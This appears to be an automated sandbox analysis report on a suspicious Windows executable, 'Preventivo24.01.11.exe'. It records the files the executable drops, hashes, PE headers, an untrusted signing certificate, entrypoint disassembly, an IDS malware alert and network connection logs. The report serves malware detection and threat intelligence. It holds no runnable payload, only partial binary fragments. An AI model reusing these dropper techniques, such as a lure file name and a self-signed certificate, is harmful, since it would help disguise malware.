                                                                            Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<.............../...#........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...-.......3...0...@...1...2...5...4...=...6...7...8...9...:...;.......e...>...?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...`...a...b...c...d...f...y...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2648008
                                                                            Entropy (8bit):6.675995874896264
                                                                            Encrypted:false
                                                                            SSDEEP:49152:Z2snRpZfSwHuWoeeArWCPu6xec3dAAUA/JNw:YsR7Xl7pu6x/I
                                                                            MD5:663FE548A57BBD487144EC8226A7A549
                                                                            SHA1:6F3E790D8E42A7C1655C37A64852BAB9EEAADCEE
                                                                            SHA-256:3FB38EEFB8DB4D52BE428FACC8A242997AB2AD58A8D08980A7688C9BF0B30454
                                                                            SHA-512:63203A0FC98E9158AEB5C668FE093A1B1C11565D1222F48F259325EE2E715038A2585F9C307047E33FA778877C2129D926A0D15BFED6B6638E4AE01B78786A6B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......+.meo..6o..6o..6...7c..6...7...6...7{..6...6a..6=..7{..6=..7u..6=..7_..6...7H..6o..6C..6...7n..6o..6...6...7r..6...7..6...7n..6...6n..6o..6n..6...7n..6Richo..6........PE..L...3*4e.....................>......3.............@.......................... 0.......(...@.................................d...,.....".(............@(..'...`/. ...`~..8............................~..@............................................text...F........................... ..`.rdata..z=.......>..................@..@.data...............................@....rsrc...(.....".....................@..@.reloc.. ....`/.......'.............@..B................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):412832
                                                                            Entropy (8bit):6.584221629525791
                                                                            Encrypted:false
                                                                            SSDEEP:12288:zeLkVzUuD6yjqilGbz+ytVYeVhu1CeYv5dSCsHBl:z0klUuD6yjqwGb3YKndxsD
                                                                            MD5:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                            SHA1:8172071A639681934D3DC77189EB88A04C8BCFAC
                                                                            SHA-256:E48AAC5148B261371C714B9E00268809832E4F82D23748E44F5CFBBF20CA3D3F
                                                                            SHA-512:4BDD4BF57EAF0C9914E483E160182DB7F2581B0E2ADC133885BF0F364123D849D247D3F077A58D930E80502A7F27F1457F7E2502D466AEC80A4FBEEBD0B59415
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.5E0.[.0.[.0.[.$.X.>.[.$.^...[..._.!.[...X.'.[...^.`.[.$._.'.[.$.].1.[.$.Z.#.[.0.Z...[...R.#.[....1.[.0...1.[...Y.1.[.Rich0.[.................PE..L...f..^.........."......z...........P............@..................................#....@.................................h........0...............2.......@..<;.....p...........................@...@............................................text....x.......z.................. ..`.rdata...S.......T...~..............@..@.data....6..........................@....rsrc........0......................@..@.reloc..<;...@...<..................@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):87728
                                                                            Entropy (8bit):6.419830608221278
                                                                            Encrypted:false
                                                                            SSDEEP:1536:IOmWBhamWHh2ZAErVlIwHnURbrK3qCLZO8asWgcdle0yBCaaeJH47EcS:IOmo9rJVltnURbMsxletBCaaeJH47EcS
                                                                            MD5:7065625D4F5E1730EADE5A9B4B5A6948
                                                                            SHA1:A8F96C8708E0BD23FC9F0B959C49863080A188DD
                                                                            SHA-256:4D12FEBD622266220AA2DD2074972EE82545C144DC599F68866212A29DB9F442
                                                                            SHA-512:A55E9F1581E3410989EE9C0DAC394E0CF3E3085CAF623F6082E2B3C06A776789B86B87CF17CEEAF582B762B2D6B3C1D554B67A91AE7F87782BC5B6DCCD082186
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... . -djN~djN~djN~p.M.njN~p.K..jN~p.J.vjN~..K.EjN~..J.kjN~..M.ujN~p.O.mjN~djO~.jN~..K.ejN~..N.ejN~...~ejN~dj.~ejN~..L.ejN~RichdjN~........................PE..L...o.&a...........!.................%..............................................&................................'.......(..d....`...............<.......p..........T...........................0...@............................................text............................... ..`.rdata...a.......b..................@..@.data........@......................@....rsrc........`.......&..............@..@.reloc.......p.......,..............@..B................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {1CBDA787-08B6-4366-B2DC-C0D053E322DE}, Number of Words: 8, Subject: Photo and vn, Author: Photo and Fax Vn, Name of Creating Application: Photo and vn (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Photo and vn. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jan 14 08:14:24 2024, Last Saved Time/Date: Sun Jan 14 08:14:24 2024, Last Printed: Sun Jan 14 08:14:24 2024, Number of Pages: 450
                                                                            Category:dropped
                                                                            Size (bytes):2615808
                                                                            Entropy (8bit):6.621481030425916
                                                                            Encrypted:false
                                                                            SSDEEP:49152:tt/eWK9YwPhH9D+g5jv5m36W547vB+gjB1JMDhB5geIF/bseA:zmD+cmqvPjB1cE
                                                                            MD5:ADC098D9A02A0A0710E8A7D6D2BFEA1D
                                                                            SHA1:46167254D9A5475A3D0A36DCDB7F4031A8B148D1
                                                                            SHA-256:B73B46F35142989A10C91AA887F94037271B8EE7148CC3BFB061AE9848ED1FD9
                                                                            SHA-512:6B8C29E98E246BC60FD612DC9ACC80760000EE9867A7B656B9CD4201831559A62C1DB9278282E6F63692EE7EE71DEEC62163C8C41F9174D7255BFD1427B6CF8F
                                                                            Malicious:false
                                                                            Preview:......................>...................(...................................M.......f.......S...T...U...V...W...X...Y.......O...P...Q...R...S...T...U...V...W...X...Y...Z...?...@...A...B...C...D...E...F...G...H...I...J...K...L.......................................................................................................................................................................................................................................................................................................<...................1...;....................................................................................... ...!..."...#...$...%...0...'...(...)...*...+...,...-......./.......2...8...3...4...5...6...7...<...9...:...C...F...=...>...?...@...A...B...C...D...E...O...G...H...I...J...K...L...F.......O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4488558
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:E819399D28E8E9609668E3A7D70D66A6
                                                                            SHA1:F0DD69687E297372EEFD387BA470EFC23A40F7A8
                                                                            SHA-256:54B022ED416A22F82DF0B5C7A360E3923AF35ACEE6A6BAC7410B53B5EC8FBB63
                                                                            SHA-512:A0429517A6B86084267230E47404195C15C330B5F9F567693924B702CE7874DACD47B273F0964442C1BE3E97D11962189D2F0B07D24EB8A9AED9C26470278925
                                                                            Malicious:false
                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):28
                                                                            Entropy (8bit):4.208966082694623
                                                                            Encrypted:false
                                                                            SSDEEP:3:nLWGWNI3ov:nyGWNOov
                                                                            MD5:F2CE4C29DC78D5906090690C345EAF80
                                                                            SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                                                                            SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                                                                            SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                                                                            Malicious:false
                                                                            Preview:No Instance(s) Available....
                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):41
                                                                            Entropy (8bit):4.1874503350805945
                                                                            Encrypted:false
                                                                            SSDEEP:3:OT2egJgkuLekbevn:OC39uLevn
                                                                            MD5:C80A61EC2FFEB4F20A47DF967C372762
                                                                            SHA1:D8C7166F59BB7022A966455DE5256C9A248D8B07
                                                                            SHA-256:B29385F78B29999A6E4A4133262F5AF567372A4E30C4023E20AD0899B023B76E
                                                                            SHA-512:CFB36B5FD2B5B17F9B93EC4D83286CD6F1F7B56FEC378F816055B46075386E5D9763B2435D0685410002934E74FFC94EA2E822E18C732CD5D0032856F87FAE89
                                                                            Malicious:false
                                                                            Preview:Environment variable GUID[ not defined..
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.141133782753418
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Preventivo24.01.11.exe
                                                                            File size:5'955'744 bytes
                                                                            MD5:32f35b78a3dc5949ce3c99f2981def6b
                                                                            SHA1:18a24aa0ac052d31fc5b56f5c0187041174ffc61
                                                                            SHA256:0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
                                                                            SHA512:e14962926f7544f894b84b3091b884b2f9b54c8b40e44e55c43b2df112d68555ddfca268353e278651cc7994011e456ac4515f1b7f0787e499f19dbd75d95cb5
                                                                            SSDEEP:98304:7azvMgOJRWT7tRyYsQdTEDdoJr7dJDqpbhUwkasM+u1JfJXibUPHI:7azvMgOJRWT7ukTE5oNqZX1WUA
                                                                            TLSH:0C569D30B15AC62ED56241F1192CDAAB911D6D3A0F6190DBB3DC7E6F2BB04C35236E27
                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ul..1...1...1...............0...7...%...7...(...7...\.......=.......*.......8.......0...1.......\.......\.l.0...1...0...\...0..
                                                                            Icon Hash:30281012004140c2
                                                                            Entrypoint:0x60b100
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6582CD64 [Wed Dec 20 11:17:56 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:36aca8edddb161c588fcf5afdc1ad9fa
                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=CodeSigningCert
                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                            Error Number:-2146762487
                                                                            Not Before, Not After
                                                                            • 28/02/2023 11:15:47 28/02/2025 11:25:47
                                                                            Subject Chain
                                                                            • CN=CodeSigningCert
                                                                            Version:3
                                                                            Thumbprint MD5:5082070071D2E70CFB8AF6145E2E0DAD
                                                                            Thumbprint SHA-1:A1846ABF798522A5B115A90F5C3283CE050626F2
                                                                            Thumbprint SHA-256:0C21B06B3EDE50F24284DDB567B4370193279F3E59A9A1BB602D9A9C230B4D28
                                                                            Serial:12E79E88324CCEA94E0358CCB4A75075
                                                                            Instruction
                                                                            call 00007FED44B96F8Bh
                                                                            jmp 00007FED44B967CDh
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            and dword ptr [0074EC4Ch], 00000000h
                                                                            sub esp, 24h
                                                                            or dword ptr [0074B020h], 01h
                                                                            push 0000000Ah
                                                                            call dword ptr [00697268h]
                                                                            test eax, eax
                                                                            je 00007FED44B96B02h
                                                                            and dword ptr [ebp-10h], 00000000h
                                                                            xor eax, eax
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor ecx, ecx
                                                                            lea edi, dword ptr [ebp-24h]
                                                                            push ebx
                                                                            cpuid
                                                                            mov esi, ebx
                                                                            pop ebx
                                                                            nop
                                                                            mov dword ptr [edi], eax
                                                                            mov dword ptr [edi+04h], esi
                                                                            mov dword ptr [edi+08h], ecx
                                                                            xor ecx, ecx
                                                                            mov dword ptr [edi+0Ch], edx
                                                                            mov eax, dword ptr [ebp-24h]
                                                                            mov edi, dword ptr [ebp-20h]
                                                                            mov dword ptr [ebp-0Ch], eax
                                                                            xor edi, 756E6547h
                                                                            mov eax, dword ptr [ebp-18h]
                                                                            xor eax, 49656E69h
                                                                            mov dword ptr [ebp-04h], eax
                                                                            mov eax, dword ptr [ebp-1Ch]
                                                                            xor eax, 6C65746Eh
                                                                            mov dword ptr [ebp-08h], eax
                                                                            xor eax, eax
                                                                            inc eax
                                                                            push ebx
                                                                            cpuid
                                                                            mov esi, ebx
                                                                            pop ebx
                                                                            nop
                                                                            lea ebx, dword ptr [ebp-24h]
                                                                            mov dword ptr [ebx], eax
                                                                            mov eax, dword ptr [ebp-04h]
                                                                            or eax, dword ptr [ebp-08h]
                                                                            or eax, edi
                                                                            mov dword ptr [ebx+04h], esi
                                                                            mov dword ptr [ebx+08h], ecx
                                                                            mov dword ptr [ebx+0Ch], edx
                                                                            jne 00007FED44B96995h
                                                                            mov eax, dword ptr [ebp-24h]
                                                                            and eax, 0FFF3FF0h
                                                                            cmp eax, 000106C0h
                                                                            je 00007FED44B96975h
                                                                            cmp eax, 00020660h
                                                                            je 00007FED44B9696Eh
                                                                            cmp eax, 00020670h
                                                                            je 00007FED44B96967h
                                                                            cmp eax, 00030650h
                                                                            je 00007FED44B96960h
                                                                            cmp eax, 00030660h
                                                                            je 00007FED44B96959h
                                                                            cmp eax, 00030670h
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3491080x3c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3590000x56a58.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x5adb100x590
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3b00000x2d550.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x2eb4b00x70.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x2eb5400x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bcb500x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2970000x320.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3463bc0x260.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x295bca0x295c009df1023178e489408abd4de59ea6f5ecunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x2970000xb33620xb34001a85f2a6b8a9c3902456bab47389e1feFalse0.32838378225244075data5.079377208024134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x34b0000xcc000x340097e28501cab3e5e33657a71481a58ba7False0.23963341346153846data4.542379696709195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .didat0x3580000x7100x8001b38fc929380aabe59305fcde2681d14False0.40966796875data4.5338796899883915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x3590000x56a580x56c0041897894c7d6aefff121b66fdd927208False0.11699049891930836data4.274410528854854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x3b00000x2d5500x2d600b8dcb36c465b4630e3506c3a7521632fFalse0.4789568267906336data6.568383422414792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_BITMAP0x3598e00x13eDevice independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colorsEnglishUnited States0.25471698113207547
                                                                            RT_BITMAP0x359a200x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.03017241379310345
                                                                            RT_BITMAP0x35a2480x48a8Device independent bitmap graphic, 290 x 16 x 32, image size 0EnglishUnited States0.11881720430107527
                                                                            RT_BITMAP0x35eaf00xa6aDevice independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/mEnglishUnited States0.21680420105026257
                                                                            RT_BITMAP0x35f55c0x152Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colorsEnglishUnited States0.5295857988165681
                                                                            RT_BITMAP0x35f6b00x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.4875478927203065
                                                                            RT_ICON0x35fed80x2b528Device independent bitmap graphic, 256 x 336 x 32, image size 172032, resolution 2834 x 2834 px/mEnglishUnited States0.11184685090843514
                                                                            RT_ICON0x38b4000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08703319502074688
                                                                            RT_ICON0x38d9a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.16463414634146342
                                                                            RT_ICON0x38ea500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.18565573770491803
                                                                            RT_ICON0x38f3d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3262411347517731
                                                                            RT_DIALOG0x38f8400xacdataEnglishUnited States0.7151162790697675
                                                                            RT_DIALOG0x38f8ec0xccdataEnglishUnited States0.6911764705882353
                                                                            RT_DIALOG0x38f9b80x1b4dataEnglishUnited States0.5458715596330275
                                                                            RT_DIALOG0x38fb6c0x136dataEnglishUnited States0.6064516129032258
                                                                            RT_DIALOG0x38fca40x4cdataEnglishUnited States0.8289473684210527
                                                                            RT_STRING0x38fcf00x234dataEnglishUnited States0.4645390070921986
                                                                            RT_STRING0x38ff240x182dataEnglishUnited States0.5103626943005182
                                                                            RT_STRING0x3900a80x50dataEnglishUnited States0.7375
                                                                            RT_STRING0x3900f80x9adataEnglishUnited States0.37662337662337664
                                                                            RT_STRING0x3901940x2f6dataEnglishUnited States0.449868073878628
                                                                            RT_STRING0x39048c0x5c0dataEnglishUnited States0.3498641304347826
                                                                            RT_STRING0x390a4c0x434dataEnglishUnited States0.32899628252788105
                                                                            RT_STRING0x390e800x100dataEnglishUnited States0.5703125
                                                                            RT_STRING0x390f800x484dataEnglishUnited States0.39186851211072665
                                                                            RT_STRING0x3914040x1eadataEnglishUnited States0.44081632653061226
                                                                            RT_STRING0x3915f00x18adataEnglishUnited States0.5228426395939086
                                                                            RT_STRING0x39177c0x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                            RT_STRING0x3919940x624dataEnglishUnited States0.3575063613231552
                                                                            RT_STRING0x391fb80x660dataEnglishUnited States0.3474264705882353
                                                                            RT_STRING0x3926180x2e2dataEnglishUnited States0.4037940379403794
                                                                            RT_GROUP_ICON0x3928fc0x14dataEnglishUnited States1.2
                                                                            RT_VERSION0x3929100x30cdataEnglishUnited States0.441025641025641
                                                                            RT_HTML0x392c1c0x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                                                                            RT_HTML0x3964540x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                                                                            RT_HTML0x39776c0x8c77HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.08081426068578103
                                                                            RT_HTML0x3a03e40x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                                                                            RT_HTML0x3a6eb40x6a2HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3486454652532391
                                                                            RT_HTML0x3a75580x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                                                                            RT_HTML0x3a85a40x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                                                                            RT_HTML0x3a9b580x205cexported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13604538870111058
                                                                            RT_HTML0x3abbb40x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                                                                            RT_MANIFEST0x3af2440x813XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.41025641025641024
                                                                            DLLImport
                                                                            KERNEL32.dllWriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, InitializeCriticalSectionEx, CloseHandle, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, LoadLibraryA, CreateFileW
                                                                            imagehlp.dllSymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308TCP2834928ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller)4970580192.168.2.593.184.216.34
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 23, 2024 12:17:58.867115021 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:17:58.969831944 CET804972993.184.216.34192.168.2.4
                                                                            Jan 23, 2024 12:17:58.969996929 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:17:58.970385075 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:17:59.072958946 CET804972993.184.216.34192.168.2.4
                                                                            Jan 23, 2024 12:17:59.073906898 CET804972993.184.216.34192.168.2.4
                                                                            Jan 23, 2024 12:17:59.074006081 CET804972993.184.216.34192.168.2.4
                                                                            Jan 23, 2024 12:17:59.074079037 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:17:59.074244976 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:17:59.078406096 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:17:59.078449011 CET4972980192.168.2.493.184.216.34
                                                                            Jan 23, 2024 12:18:17.642659903 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.642687082 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.643018007 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.643337965 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.643349886 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.886384010 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.887391090 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.887402058 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.888324022 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.888484001 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.888489962 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.888566971 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.891391039 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.891453028 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:17.891575098 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:17.891587019 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.082823992 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.117850065 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.118026018 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.118132114 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.119770050 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.119770050 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.119786978 CET4434973852.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.120383978 CET49738443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.124455929 CET49740443192.168.2.452.202.204.11
